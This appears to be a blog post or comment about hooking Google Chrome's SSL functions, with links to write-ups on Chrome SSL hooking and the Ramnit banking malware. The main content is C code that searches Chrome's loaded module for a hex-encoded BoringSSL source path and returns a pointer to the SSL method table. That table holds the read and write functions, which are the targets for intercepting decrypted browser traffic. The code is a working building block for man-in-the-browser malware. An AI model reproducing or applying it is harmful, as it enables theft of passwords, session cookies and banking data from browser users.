https://nytrosecurity.com/2018/02/26/hooking-chromes-ssl-functions/ http://www.rohitab.com/discuss/topic/41729-google-chrome-ssl-write-hook-openssl/
https://www.emanueledelucia.net/the-ramnit-web-browser-specialist-hooker-number-ii/

Now the decoded string below translates to: c:\b\build\slave\win\build\src\third_party\boringssl\src\ssl\ssl_lib.c

typedef struct \_SSLMETHODS { int version; int (*ssl3\_new)(void *s); int (\*ssl3_clear)(void\*s); void (*ssl3_free)(void *s); int (*ssl3_accept)(void *s); int (*ssl3_connect)(void *s); int (*ssl3_read)(void *s, void *buf, int len); int (*ssl3_peek)(void *s, void *buf, int len); int (*ssl3_write)(void *s, const void *buf, int len); int (*ssl3_shutdown)(void *s); }SSLMETHODS, *PSSLMETHODS;

PSSLMETHODS FindSSLWrite(char* szModule) { unsigned char ucString[] = { 0x63,0x3a,0x5c,0x62,0x5c,0x62,0x75,0x69,0x6c,0x64,0x5c,0x73,0x6c,0x61,0x76,0x65,0x5c,0x77,0x69,0x6e,0x5c,0x62,0x75,0x69,0x6c,0x64,0x5c,0x73,0x72,0x63,0x5c,0x74,0x68,0x69,0x72,0x64,0x5f,0x70,0x61,0x72,0x74,0x79,0x5c,0x62,0x6f,0x72,0x69,0x6e,0x67,0x73,0x73,0x6c,0x5c,0x73,0x72,0x63,0x5c,0x73,0x73,0x6c,0x5c,0x73,0x73,0x6c,0x5f,0x6c,0x69,0x62,0x2e,0x63,0x00};

    HMODULE hModule = GetModuleHandleA(szModule);
    if (hModule)
    {
        PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)hModule;
        PIMAGE_NT_HEADERS pNT = (PIMAGE_NT_HEADERS)(pDos->e_lfanew + (DWORD)hModule);
        if (pNT->Signature == IMAGE_NT_SIGNATURE)
        {
            PIMAGE_SECTION_HEADER pSection = 0;
            int i = 0;
            for (i = 0 ;i < pNT->FileHeader.NumberOfSections; i ++)
            {
                pSection = (PIMAGE_SECTION_HEADER)((DWORD)pNT + sizeof(IMAGE_NT_HEADERS) + (sizeof(IMAGE_SECTION_HEADER)*i));
                if (!strcmp((char*)pSection->Name, ".rdata"))
                {
                    int Offset = 0;
                    for(Offset = 0; Offset<pSection->SizeOfRawData;Offset++)
                    {
                        DWORD dwPosition = (DWORD)hModule+pSection->VirtualAddress + Offset;
                        if (!memcmp(ucString,(LPVOID)dwPosition,sizeof(ucString)))
                            return (PSSLMETHODS)(dwPosition - 0x64);
                    }
                }
            }
        }
    }
    return 0;


}

Leave a Reply

Your email address will not be published. Required fields are marked *

To create code blocks or other preformatted text, indent by four spaces:

    This will be displayed in a monospaced font. The first four 
    spaces will be stripped off, but all other whitespace
    will be preserved.
    
    Markdown is turned off in code blocks:
     [This is not a link](http://example.com)

To create not a block, but an inline code span, use backticks:

Here is some inline `code`.

For more help see http://daringfireball.net/projects/markdown/syntax